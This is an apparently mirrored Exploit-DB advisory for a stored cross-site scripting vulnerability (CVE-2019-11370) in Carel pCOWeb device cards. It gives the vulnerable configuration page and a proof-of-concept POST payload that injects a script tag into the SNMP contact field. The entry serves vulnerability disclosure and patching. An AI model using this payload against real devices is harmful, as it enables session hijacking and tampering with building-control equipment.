Lucene search
Luca.ChiouEDB-ID:46897HistoryMay 22, 2019 - 12:00 a.m.
Carel pCOWeb < B1.2.1 - Cross-Site Scripting
2019-05-2200:00:00
Luca.Chiou
www.exploit-db.com
105
AI Score
7.4
Confidence
Low
# Exploit Title: Carel pCOWeb - Stored XSS
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.carel.com/
# Version: Carel pCOWeb all versions prior to B1.2.1
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
# 1. Description:
# In Carel pCOWeb web page,
# user can modify the system configuration by access the /config/pw_snmp.html.
# Attackers can inject malicious XSS code in post data.
# The XSS code will be stored in database, so that cause a stored XSS vulnerability.
# 2. Proof of Concept:
# Browse http://<Your<http://%3cYour> Modem IP>/config/pw_snmp.html
# Send this post data:
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
# The post data in URL decode format is:
?script:setdb('snmp','syscontact')="><script>alert(123)</script>Related
prion
prion
Cross site scripting
2019-06-03 20:29:00
nvd
nvd
CVE-2019-11370
2019-06-03 20:29:00
cve
cve
CVE-2019-11370
2019-06-03 20:29:00
nuclei
nuclei
Carel pCOWeb <B1.2.4 - Cross-Site Scripting
2022-07-30 12:03:57
cvelist
cvelist
CVE-2019-11370
2019-06-03 19:44:10